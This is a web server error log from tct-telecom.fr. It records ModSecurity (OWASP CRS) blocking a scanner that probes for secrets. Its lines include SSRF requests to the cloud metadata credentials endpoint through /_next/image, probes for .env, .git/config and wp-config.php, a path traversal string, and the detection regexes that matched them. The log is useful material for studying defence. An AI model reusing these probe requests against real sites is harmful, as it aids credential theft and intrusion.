[Mon May 11 15:23:18.760191 2026] [security2:error] [pid 1319953:tid 1319971] [client 195.178.110.133:3954] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.portail.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYRuSQ-m-m0ukSShuCTgAAAVA"]
[Mon May 11 15:23:18.760860 2026] [security2:error] [pid 1319953:tid 1319971] [client 195.178.110.133:3954] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYRuSQ-m-m0ukSShuCTgAAAVA"]
[Mon May 11 15:23:18.761091 2026] [security2:error] [pid 1319953:tid 1319971] [client 195.178.110.133:3954] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYRuSQ-m-m0ukSShuCTgAAAVA"]
[Mon May 11 15:23:18.774542 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:18.775191 2026] [proxy_fcgi:error] [pid 1319998:tid 1320015] [client 195.178.110.133:4016] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:18.802624 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:18.820121 2026] [security2:error] [pid 1320674:tid 1320702] [client 195.178.110.133:4060] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYRqO9RdIr1DwxYR2TEgAAAM0"]
[Mon May 11 15:23:18.820308 2026] [security2:error] [pid 1320674:tid 1320702] [client 195.178.110.133:4060] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYRqO9RdIr1DwxYR2TEgAAAM0"]
[Mon May 11 15:23:18.820556 2026] [security2:error] [pid 1320674:tid 1320702] [client 195.178.110.133:4060] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYRqO9RdIr1DwxYR2TEgAAAM0"]
[Mon May 11 15:23:18.822778 2026] [security2:error] [pid 1319953:tid 1319971] [client 195.178.110.133:3954] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.portail.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYRuSQ-m-m0ukSShuCUwAAAVA"]
[Mon May 11 15:23:18.823437 2026] [security2:error] [pid 1319953:tid 1319971] [client 195.178.110.133:3954] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYRuSQ-m-m0ukSShuCUwAAAVA"]
[Mon May 11 15:23:18.823632 2026] [security2:error] [pid 1319953:tid 1319971] [client 195.178.110.133:3954] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYRuSQ-m-m0ukSShuCUwAAAVA"]
[Mon May 11 15:23:18.827433 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:18.837852 2026] [security2:error] [pid 1320674:tid 1320702] [client 195.178.110.133:4060] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYRqO9RdIr1DwxYR2TEwAAAM0"]
[Mon May 11 15:23:18.838039 2026] [security2:error] [pid 1320674:tid 1320702] [client 195.178.110.133:4060] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYRqO9RdIr1DwxYR2TEwAAAM0"]
[Mon May 11 15:23:18.838268 2026] [security2:error] [pid 1320674:tid 1320702] [client 195.178.110.133:4060] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYRqO9RdIr1DwxYR2TEwAAAM0"]
[Mon May 11 15:23:18.841816 2026] [proxy_fcgi:error] [pid 1319998:tid 1320015] [client 195.178.110.133:4016] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:18.846536 2026] [security2:error] [pid 1319953:tid 1319971] [client 195.178.110.133:3954] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.portail.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYRuSQ-m-m0ukSShuCVAAAAVA"]
[Mon May 11 15:23:18.847327 2026] [security2:error] [pid 1319953:tid 1319971] [client 195.178.110.133:3954] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYRuSQ-m-m0ukSShuCVAAAAVA"]
[Mon May 11 15:23:18.847559 2026] [security2:error] [pid 1319953:tid 1319971] [client 195.178.110.133:3954] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYRuSQ-m-m0ukSShuCVAAAAVA"]
[Mon May 11 15:23:18.856351 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:18.861969 2026] [proxy_fcgi:error] [pid 1319998:tid 1320015] [client 195.178.110.133:4016] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:18.883983 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:18.893901 2026] [proxy_fcgi:error] [pid 1320398:tid 1320407] [client 195.178.110.133:3884] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:18.916631 2026] [proxy_fcgi:error] [pid 1319885:tid 1319893] [client 195.178.110.133:3928] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:18.918372 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:18.937555 2026] [proxy_fcgi:error] [pid 1320398:tid 1320422] [client 195.178.110.133:3912] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:18.945052 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:18.955886 2026] [proxy_fcgi:error] [pid 1320398:tid 1320422] [client 195.178.110.133:3912] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:18.970559 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:18.985529 2026] [proxy_fcgi:error] [pid 1320398:tid 1320422] [client 195.178.110.133:3912] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:18.995606 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:19.009304 2026] [proxy_fcgi:error] [pid 1320398:tid 1320422] [client 195.178.110.133:3912] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:19.023457 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:19.035152 2026] [proxy_fcgi:error] [pid 1319886:tid 1319924] [client 195.178.110.133:3990] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:19.053379 2026] [proxy_fcgi:error] [pid 1319886:tid 1319924] [client 195.178.110.133:3990] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:19.059493 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:19.074054 2026] [proxy_fcgi:error] [pid 1319886:tid 1319924] [client 195.178.110.133:3990] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:19.079842 2026] [security2:error] [pid 1320398:tid 1320410] [client 195.178.110.133:2936] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYQ-JEyNRN152ArOSM5gAAAEo"]
[Mon May 11 15:23:19.088593 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:19.114597 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:20.146858 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:20.181869 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:20.220453 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:20.246233 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:20.281746 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:20.306564 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:20.331422 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:20.361577 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:20.363764 2026] [security2:error] [pid 1320674:tid 1320698] [client 195.178.110.133:2864] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYQ6O9RdIr1DwxYR2S0wAAAMg"]
[Mon May 11 15:23:20.387028 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:20.412524 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:20.437610 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:20.466440 2026] [security2:error] [pid 1319885:tid 1319930] [client 195.178.110.133:46730] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /storage/app/../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.dev.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYSFchVQ3tCn0m9OpZgQAAARU"]
[Mon May 11 15:23:20.466526 2026] [security2:error] [pid 1319885:tid 1319930] [client 195.178.110.133:46730] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.dev.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYSFchVQ3tCn0m9OpZgQAAARU"]
[Mon May 11 15:23:20.466645 2026] [security2:error] [pid 1319885:tid 1319930] [client 195.178.110.133:46730] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYSFchVQ3tCn0m9OpZgQAAARU"]
[Mon May 11 15:23:20.468556 2026] [security2:error] [pid 1319886:tid 1319929] [client 195.178.110.133:46618] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.dev.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYSKy-5-wpj6Sx56aZIwAAABM"]
[Mon May 11 15:23:20.468687 2026] [security2:error] [pid 1319886:tid 1319929] [client 195.178.110.133:46618] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYSKy-5-wpj6Sx56aZIwAAABM"]
[Mon May 11 15:23:20.469689 2026] [security2:error] [pid 1319885:tid 1319910] [client 195.178.110.133:46754] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/commit_editmsg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.dev.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agHYSFchVQ3tCn0m9OpZgwAAAQ0"]
[Mon May 11 15:23:20.469811 2026] [security2:error] [pid 1319885:tid 1319910] [client 195.178.110.133:46754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agHYSFchVQ3tCn0m9OpZgwAAAQ0"]
[Mon May 11 15:23:20.472293 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:20.478030 2026] [security2:error] [pid 1319953:tid 1319963] [client 195.178.110.133:46694] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.dev.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHYSOSQ-m-m0ukSShuCXQAAAUg"]
[Mon May 11 15:23:20.478215 2026] [security2:error] [pid 1319953:tid 1319963] [client 195.178.110.133:46694] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHYSOSQ-m-m0ukSShuCXQAAAUg"]
[Mon May 11 15:23:20.497138 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:20.525532 2026] [security2:error] [pid 1319886:tid 1319917] [client 195.178.110.133:46664] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.dev.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYSKy-5-wpj6Sx56aZJQAAAAw"]
[Mon May 11 15:23:20.526280 2026] [security2:error] [pid 1319886:tid 1319917] [client 195.178.110.133:46664] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYSKy-5-wpj6Sx56aZJQAAAAw"]
[Mon May 11 15:23:20.528406 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:20.975136 2026] [access_compat:error] [pid 1319886:tid 1319916] [client 195.178.110.133:46728] AH01797: client denied by server configuration: /home/tcttelec/dev.tct-telecom.fr/wp-config.php
[Mon May 11 15:23:20.981049 2026] [security2:error] [pid 1320674:tid 1320708] [client 195.178.110.133:46710] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.dev.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYSKO9RdIr1DwxYR2THgAAANM"]
